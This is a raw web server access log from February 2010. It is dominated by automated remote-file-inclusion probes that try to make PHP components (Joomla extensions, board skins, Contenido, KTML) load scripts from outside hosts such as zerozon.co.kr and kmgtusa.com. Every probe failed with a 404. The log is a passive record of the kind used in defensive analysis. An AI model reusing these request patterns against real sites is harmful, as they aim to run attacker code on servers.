200.93.147.154 - - [25/Feb/2010:04:58:46 -0800] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.40.30.37 - - [25/Feb/2010:05:00:20 -0800] "GET /logs/access_100118.log%20%20//delete_all.php?board_skin_path=http://www.sinaelee.com/lib/1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.40.30.37 - - [25/Feb/2010:05:00:34 -0800] "GET /logs/access_100118.log%20%20//delete_all.php?board_skin_path=http://www.sinaelee.com/lib/1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [25/Feb/2010:05:00:37 -0800] "GET /logs/access_100208.log%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.96 - - [25/Feb/2010:05:00:52 -0800] "GET /include/mail.inc.php?skin_board_path=http://www.sosos.co.kr/id.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
200.93.147.154 - - [25/Feb/2010:05:00:57 -0800] "GET /logs/access_100208.log%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [25/Feb/2010:05:01:54 -0800] "GET /logs/access_100208.log%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [25/Feb/2010:05:02:00 -0800] "GET /logs/access_100208.log%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [25/Feb/2010:05:03:23 -0800] "GET /logs/access_100208.log%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.78.134.133 - - [25/Feb/2010:05:05:49 -0800] "GET /logs/access_100213.log%20%20//zboard/skin/happycast//setup.php?dir=http://www.myphotolife.co.kr/temp/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.78.134.133 - - [25/Feb/2010:05:05:49 -0800] "GET /logs//zboard/skin/happycast//setup.php?dir=http://www.myphotolife.co.kr/temp/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.78.134.133 - - [25/Feb/2010:05:05:50 -0800] "GET /zboard/skin/happycast//setup.php?dir=http://www.myphotolife.co.kr/temp/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.44.84.221 - - [25/Feb/2010:05:05:54 -0800] "GET /logs/contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.44.84.221 - - [25/Feb/2010:05:05:54 -0800] "GET /contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.44.84.221 - - [25/Feb/2010:05:05:54 -0800] "GET /logs/access_100124.log%20%20/contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.78.134.133 - - [25/Feb/2010:05:07:35 -0800] "GET /logs/access_100209.log%20%20//zboard/skin/happycast//setup.php?dir=http://www.myphotolife.co.kr/temp/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.206.206.28 - - [25/Feb/2010:05:07:56 -0800] "GET /logs/access_100121.log//bbs/delete_comment.php?board_skin_path=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.206.206.28 - - [25/Feb/2010:05:07:56 -0800] "GET /logs//bbs/delete_comment.php?board_skin_path=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.206.206.28 - - [25/Feb/2010:05:07:56 -0800] "GET /bbs/delete_comment.php?board_skin_path=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
95.131.66.198 - - [25/Feb/2010:05:09:44 -0800] "GET /logs/access_100214.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/ID1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
95.131.66.198 - - [25/Feb/2010:05:09:44 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/ID1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
95.131.66.198 - - [25/Feb/2010:05:09:44 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/ID1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.234.21.38 - - [25/Feb/2010:05:09:57 -0800] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.234.21.38 - - [25/Feb/2010:05:09:57 -0800] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.234.21.38 - - [25/Feb/2010:05:09:57 -0800] "GET /logs/access_100123.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.206.206.28 - - [25/Feb/2010:05:09:58 -0800] "GET /logs//bbs/delete_comment.php?board_skin_path=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.206.206.28 - - [25/Feb/2010:05:09:58 -0800] "GET /bbs/delete_comment.php?board_skin_path=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.206.206.28 - - [25/Feb/2010:05:09:58 -0800] "GET /logs/access_100121.log//bbs/delete_comment.php?board_skin_path=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
95.131.66.198 - - [25/Feb/2010:05:10:05 -0800] "GET /logs/access_100205.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/ID1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:05:10:38 -0800] "GET /contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:05:10:38 -0800] "GET /logs/contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:05:10:38 -0800] "GET /logs/access_100124.log%20%20/contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.234.21.38 - - [25/Feb/2010:05:10:55 -0800] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.234.21.38 - - [25/Feb/2010:05:10:55 -0800] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.234.21.38 - - [25/Feb/2010:05:10:55 -0800] "GET /logs/access_100123.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.234.21.38 - - [25/Feb/2010:05:10:58 -0800] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.234.21.38 - - [25/Feb/2010:05:10:58 -0800] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.234.21.38 - - [25/Feb/2010:05:10:58 -0800] "GET /logs/access_100123.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.206.206.28 - - [25/Feb/2010:05:11:56 -0800] "GET /bbs/delete_comment.php?board_skin_path=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.206.206.28 - - [25/Feb/2010:05:11:56 -0800] "GET /logs//bbs/delete_comment.php?board_skin_path=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.206.206.28 - - [25/Feb/2010:05:11:56 -0800] "GET /logs/access_100203.log%20%20//bbs/delete_comment.php?board_skin_path=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.206.206.28 - - [25/Feb/2010:05:12:03 -0800] "GET /logs/access_100206.log%20%20//bbs/delete_comment.php?board_skin_path=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
76.74.150.155 - - [25/Feb/2010:05:12:10 -0800] "GET /include/admin.lib.inc.php?site_path=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/ID1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
76.74.150.155 - - [25/Feb/2010:05:12:10 -0800] "GET /logs//include/admin.lib.inc.php?site_path=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/ID1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
76.74.150.155 - - [25/Feb/2010:05:12:11 -0800] "GET /logs/access_100204.log//include/admin.lib.inc.php?site_path=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/ID1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:05:12:17 -0800] "GET /contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:05:12:17 -0800] "GET /logs/access_100124.log%20%20/contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:05:12:17 -0800] "GET /logs/contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:05:12:18 -0800] "GET /logs/contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:05:12:18 -0800] "GET /contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:05:12:18 -0800] "GET /logs/access_100124.log%20%20/contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.124.116.194 - - [25/Feb/2010:05:12:30 -0800] "GET /logs/access_100219.log//modules/vwar/admin/admin.php?vwar_root=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.124.116.194 - - [25/Feb/2010:05:12:30 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://kmgtusa.com/includes/id1.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.124.116.194 - - [25/Feb/2010:05:12:30 -0800] "GET /modules/vwar/admin/admin.php?vwar_root=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.241.177.123 - - [25/Feb/2010:05:12:36 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.enyzone.cz/components/com_poll/ts???? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.puaga.com"
212.241.177.123 - - [25/Feb/2010:05:12:38 -0800] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.enyzone.cz/components/com_poll/ts???? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.puaga.com"
202.124.116.194 - - [25/Feb/2010:05:12:41 -0800] "GET /modules/vwar/admin/admin.php?vwar_root=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.124.116.194 - - [25/Feb/2010:05:12:41 -0800] "GET /logs/access_100219.log//modules/vwar/admin/admin.php?vwar_root=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.124.116.194 - - [25/Feb/2010:05:12:41 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
76.74.150.155 - - [25/Feb/2010:05:12:53 -0800] "GET /logs/access_100212.log//include/admin.lib.inc.php?site_path=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/ID1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.124.116.194 - - [25/Feb/2010:05:13:22 -0800] "GET /logs/access_100213.log//modules/vwar/admin/admin.php?vwar_root=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.124.116.194 - - [25/Feb/2010:05:13:39 -0800] "GET /logs/access_100213.log//modules/vwar/admin/admin.php?vwar_root=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.206.206.28 - - [25/Feb/2010:05:13:46 -0800] "GET /bbs/delete_comment.php?board_skin_path=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.206.206.28 - - [25/Feb/2010:05:13:46 -0800] "GET /logs//bbs/delete_comment.php?board_skin_path=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.206.206.28 - - [25/Feb/2010:05:13:46 -0800] "GET /logs/access_100203.log//bbs/delete_comment.php?board_skin_path=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.206.206.28 - - [25/Feb/2010:05:14:04 -0800] "GET /logs/access_100206.log//bbs/delete_comment.php?board_skin_path=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
95.131.66.198 - - [25/Feb/2010:05:14:51 -0800] "GET /logs//include/admin.lib.inc.php?site_path=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/ID1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
95.131.66.198 - - [25/Feb/2010:05:14:51 -0800] "GET /logs/access_100204.log%20%20//include/admin.lib.inc.php?site_path=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/ID1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
95.131.66.198 - - [25/Feb/2010:05:14:51 -0800] "GET /include/admin.lib.inc.php?site_path=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/ID1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.206.206.28 - - [25/Feb/2010:05:15:39 -0800] "GET /logs/access_100203.log//bbs/delete_comment.php?board_skin_path=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.206.206.28 - - [25/Feb/2010:05:15:39 -0800] "GET /logs//bbs/delete_comment.php?board_skin_path=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.206.206.28 - - [25/Feb/2010:05:15:39 -0800] "GET /bbs/delete_comment.php?board_skin_path=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.206.206.28 - - [25/Feb/2010:05:15:39 -0800] "GET /logs/access_100206.log//bbs/delete_comment.php?board_skin_path=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
76.74.150.155 - - [25/Feb/2010:05:15:49 -0800] "GET /include/admin.lib.inc.php?site_path=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/ID1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
76.74.150.155 - - [25/Feb/2010:05:15:49 -0800] "GET /logs//include/admin.lib.inc.php?site_path=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/ID1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
76.74.150.155 - - [25/Feb/2010:05:15:49 -0800] "GET /logs/access_100204.log%20%20//include/admin.lib.inc.php?site_path=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/ID1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
76.74.150.155 - - [25/Feb/2010:05:16:51 -0800] "GET /logs/access_100212.log%20%20//include/admin.lib.inc.php?site_path=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/ID1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
95.131.66.198 - - [25/Feb/2010:05:16:55 -0800] "GET /logs/access_100212.log%20%20//include/admin.lib.inc.php?site_path=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/ID1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.44.84.221 - - [25/Feb/2010:05:17:50 -0800] "GET /logs/access_100124.log/contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
76.74.150.155 - - [25/Feb/2010:05:18:39 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/ID1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
76.74.150.155 - - [25/Feb/2010:05:18:39 -0800] "GET /logs/access_100214.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/ID1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
76.74.150.155 - - [25/Feb/2010:05:18:39 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/ID1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
76.74.150.155 - - [25/Feb/2010:05:19:01 -0800] "GET /logs/access_100205.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/ID1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.128.138.73 - - [25/Feb/2010:05:20:11 -0800] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.128.138.73 - - [25/Feb/2010:05:20:11 -0800] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.128.138.73 - - [25/Feb/2010:05:20:12 -0800] "GET /logs/access_100201.log%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.128.138.73 - - [25/Feb/2010:05:20:14 -0800] "GET /logs/access_100215.log%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.128.138.73 - - [25/Feb/2010:05:20:22 -0800] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.128.138.73 - - [25/Feb/2010:05:20:22 -0800] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.128.138.73 - - [25/Feb/2010:05:20:23 -0800] "GET /logs/access_100201.log%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.128.138.73 - - [25/Feb/2010:05:20:25 -0800] "GET /logs/access_100215.log%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.128.138.73 - - [25/Feb/2010:05:20:42 -0800] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.128.138.73 - - [25/Feb/2010:05:20:42 -0800] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.128.138.73 - - [25/Feb/2010:05:20:42 -0800] "GET /logs/access_100201.log%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.128.138.73 - - [25/Feb/2010:05:20:43 -0800] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.128.138.73 - - [25/Feb/2010:05:20:43 -0800] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.128.138.73 - - [25/Feb/2010:05:20:43 -0800] "GET /logs/access_100201.log%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.128.138.73 - - [25/Feb/2010:05:20:43 -0800] "GET /logs/access_100215.log%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.128.138.73 - - [25/Feb/2010:05:20:44 -0800] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.128.138.73 - - [25/Feb/2010:05:20:44 -0800] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.128.138.73 - - [25/Feb/2010:05:20:44 -0800] "GET /logs/access_100201.log%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.128.138.73 - - [25/Feb/2010:05:20:44 -0800] "GET /logs/access_100215.log%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.128.138.73 - - [25/Feb/2010:05:20:45 -0800] "GET /logs/access_100215.log%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
201.82.194.38 - - [25/Feb/2010:05:20:57 -0800] "GET /logs/access.log HTTP/1.1" 200 122687 "-" "tdkgr5gwmeetcxjw5Mtewylrt" "www.puaga.com"
74.54.22.2 - - [25/Feb/2010:05:23:09 -0800] "GET //BOARD///BBS/WRITE_COMMENT_UPDATE.PHP/?BOARD_SKIN_PATH=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.54.22.2 - - [25/Feb/2010:05:23:09 -0800] "GET /logs///BOARD///BBS/WRITE_COMMENT_UPDATE.PHP/?BOARD_SKIN_PATH=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.54.22.2 - - [25/Feb/2010:05:23:13 -0800] "GET /logs/access_100118.log///BOARD///BBS/WRITE_COMMENT_UPDATE.PHP/?BOARD_SKIN_PATH=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.44.84.221 - - [25/Feb/2010:05:23:15 -0800] "GET /logs//toolbar.php?dirDepth=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.44.84.221 - - [25/Feb/2010:05:23:15 -0800] "GET /logs/access_100121.log%20%20//toolbar.php?dirDepth=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.44.84.221 - - [25/Feb/2010:05:23:20 -0800] "GET /toolbar.php?dirDepth=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.44.84.221 - - [25/Feb/2010:05:23:21 -0800] "GET /logs/access_100127.log%20%20//toolbar.php?dirDepth=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.195.112.232 - - [25/Feb/2010:05:24:08 -0800] "GET /logs/?D=A HTTP/1.0" 200 4926 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
67.195.112.232 - - [25/Feb/2010:05:24:17 -0800] "GET /logs/access_100224.log HTTP/1.0" 200 1389217 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
